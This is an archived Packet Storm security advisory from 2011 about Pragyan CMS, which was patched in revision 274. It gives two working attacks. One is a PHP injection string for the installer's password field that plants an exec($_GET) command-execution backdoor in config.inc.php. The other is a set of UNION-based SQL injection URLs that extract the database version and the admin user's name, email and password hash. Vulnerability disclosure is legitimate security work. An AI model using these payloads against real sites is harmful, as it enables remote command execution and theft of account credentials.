Pragyan CMS Code Execution / SQL Injection

2011-02-25T00:00:00
ID PACKETSTORM:98730
Type packetstorm
Reporter villy
Modified 2011-02-25T00:00:00

Description

                                        
                                            `*Affected Software*  
Pragyan CMS  
Product Link: http://sourceforge.net/projects/pragyan/  
  
Technical Description  
1) Code execution in INSTALL/install.php  
script not correctly validate entered fields.  
possibly write at password field string:  
  
");echo exec($_GET["a"]);echo ("  
  
or in another fields with turned of javascript.  
in cms/config.inc.php will be code:  
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");  
which allow command execution.  
  
2) sql injection  
- get mysql version  
http://host/+view&thread_id=-1 UNION ALL SELECT  
null,null,null,null,concat(unhex(Hex(cast(@@version as  
char)))),null,null,null--  
- get admin account  
http://host/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT  
concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as  
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as  
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as  
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as  
char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as  
char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT  
0,1),null,null,null--  
  
Solution  
update to Pragyan CMS 3.0 rev.274  
  
Changelog  
2011-19-02 : Initial release  
2011-20-02 : Reported to vendor  
2011-25-02 : patch released  
2011-25-02 : public disclose  
  
Credits  
Abhishek Lyall <http://aslitsecurity.blogspot.com/>  
pragyan.org  
http://egoistka.org.ua/  
  
  
--------------------  
Best wishes,  
villy  
http://bugix-security.blogspot.com/  
`